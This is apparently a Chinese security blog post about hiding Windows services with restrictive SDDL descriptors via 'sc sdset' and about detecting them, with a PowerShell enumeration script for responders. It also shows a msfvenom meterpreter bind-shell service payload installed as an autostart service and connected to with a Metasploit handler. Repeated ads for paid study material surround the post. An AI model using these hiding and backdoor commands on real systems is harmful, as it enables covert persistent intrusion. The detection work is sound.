先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
正文
https://learn.microsoft.com/zh-cn/windows/win32/services/service-security-and-access-rights
可以通过一些 SDDL
解析工具进行查看
https://github.com/canix1/SDDL-Converter
是一个 powershell
脚本,右键执行
将 SDDL
放到其中进行解析
这样看起来比较直观
0x03 修改服务权限设置
sc sdset "XblGameSave" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
0x04 测试隐藏效果
1. services.msc
2. sc
sc queryex | findstr "XblGameSave"
sc query "XblGameSave"
可以看到,常规检查的时候,无法直接看到 XblGameSave
通过 sc query
指定名称查找显示的是 拒绝访问
通过 sc qc
指定名称查找能够显示出正常内容
如果常规方式看不到,应急响应人员也无法知晓该活动的名称,也就无法查询到
3. PowerShell
Get-Service | findstr "XblGameSave"
Get-Service -Name "XblGameSave"
指定名称查询都显示找不到任何服务
4. wmic
wmic service | findstr "XblGameSave"
wmic service where "Name='XblGameSave'" get Name, DisplayName, Description
5. System Informer
https://systeminformer.sourceforge.io/
Process Hacker 的升级版
也看不到
6. 注册表
可以看到,注册表能够看到该服务,此时注册表多了一项 Security
但是不只这一个注册表有 Security
,所以也不好粗暴地作为评判依据
0x05 思考排查方法
方法一 枚举法
按照计划任务隐藏时候的思路,先看一下 sc query
查询不存在的服务时报错是什么
这里就可以看出区别,当然,完全可以用 sc qc
查询做对比,可能更好
这样的话,可以将注册表遍历一遍,之后获取服务名称,挨个查询,看看有没有拒绝访问的,这样就可以测试出是否存在隐藏的服务。当然,这前提是注册表有访问权限,如果攻击者额外设置了注册表权限,可以先取消注册表权限
方法二 高权限查看法
这种隐藏方式无非就是谁可以看,谁不可以看,在 Linux 中,几乎所有的限制对 root
都没用,我们分析一下刚才的权限设置
这里似乎对 SYSTEM
并没有限制,那我们使用 SYSTEM
权限执行这些常规检查是否可以看到呢
0x06 枚举法
思路就是先获取注册表中服务名称,之后通过 sc query
进行查询,根据反馈进行判断
$services = Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object { $_.PSChildName }
$maliciousServices = foreach ($service in $services) {
$queryOutput = sc.exe query $service 2>&1
if ($queryOutput -like "*拒绝访问*") {
$configOutput = sc.exe qc $service
[PSCustomObject]@{
ServiceName = $service
Status = "拒绝访问"
Config = $configOutput
}
}
}
if ($maliciousServices) {
Write-Host "发现以下恶意服务:"
$maliciousServices | Format-Table -AutoSize -Property ServiceName, Status
foreach ($service in $maliciousServices) {
Write-Host "--------------------------------------------------"
Write-Host "Service Name: $($service.ServiceName)"
Write-Host "Status: $($service.Status)"
Write-Host "Service Config:"
$configLines = $service.Config -split "`n"
$configLines | ForEach-Object {
$configLine = $_.Trim()
if ($configLine -ne "" -and $configLine -notlike "[*]*") {
Write-Host $configLine
}
}
Write-Host "--------------------------------------------------"
}
} else {
Write-Host "未发现恶意服务."
}
当然了,这是美化后的,如果你想简单一些,直接用下面的几行就够了
$services = Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object { $_.PSChildName }
foreach ($service in $services) {
$queryOutput = sc.exe query $service 2>&1
if ($queryOutput -like "*拒绝访问*") {
Write-Output $service
}
}
0x07 高权限法
通过 PsExec64.exe
来获取 SYSTEM
权限
PsExec64.exe
是SysinternalsSuite
套件中一款工具https://learn.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suite
PsExec64.exe -i -s cmd
PsExec
似乎会导致输入法部分功能出现问题
尝试通过 SYSTEM
权限的 cmd
进行查询
sc queryex | findstr "XblGameSave"
sc
看不到隐藏的服务
尝试通过 SYSTEM
启动 services.msc
services.msc
看不到
powershell
看不到
wmic
看不到
创建低权限的用户组和新用户也不行
看来高权限法不行
0x08 删除服务
经过枚举法,已经获取到服务名称,现在通过 sc sdset
设置权限
sc sdset "XblGameSave" "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
这样就可以通过 services.msc
进行管理了
删除服务
sc delete "ServiceName"
0x09 删除注册表文件夹会怎么样
1. 创建木马
这次使用 msf
生成一个服务木马来模拟服务
msfvenom -p windows/meterpreter/bind_tcp lport=4455 -f exe-service -o bind.exe
注意,这里指定的文件类型是 exe-service
,MSF
专门为服务准备的一类木马,中文资料上提到这个事极少
2. 创建服务
sc create test binPath= "C:\Users\Administrator\Desktop\bind.exe" start= auto depend= Tcpip obj= Localsystem
创建一个名为 test
的服务,开机自启动执行木马程序,监听 4455
端口
启动服务测试一下
sc start test
3. MSF 连接木马
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.211.55.6
set lport 4455
exploit
服务已经正常启动,关闭连接,重启受害服务器,无用户登录状态下再次尝试连接
再次获取 shell
,服务自启动没问题
4. 观察 MSF 服务情况
再次重启服务器,登录后查看服务信息如下
从服务来看 test
服务已经停止了
从进程角度来看
没有主动监听shell
相关进程
通过 MSF
进行连接
服务监听是存在的
从网络层面看
可以看到 MSF
与受害主机之间的连接
通过 wmic
查看详细情况
wmic process where ProcessId=2216 get Name, ExecutablePath, CommandLine /format:list
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-zv0jTINH-1713466283012)]
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!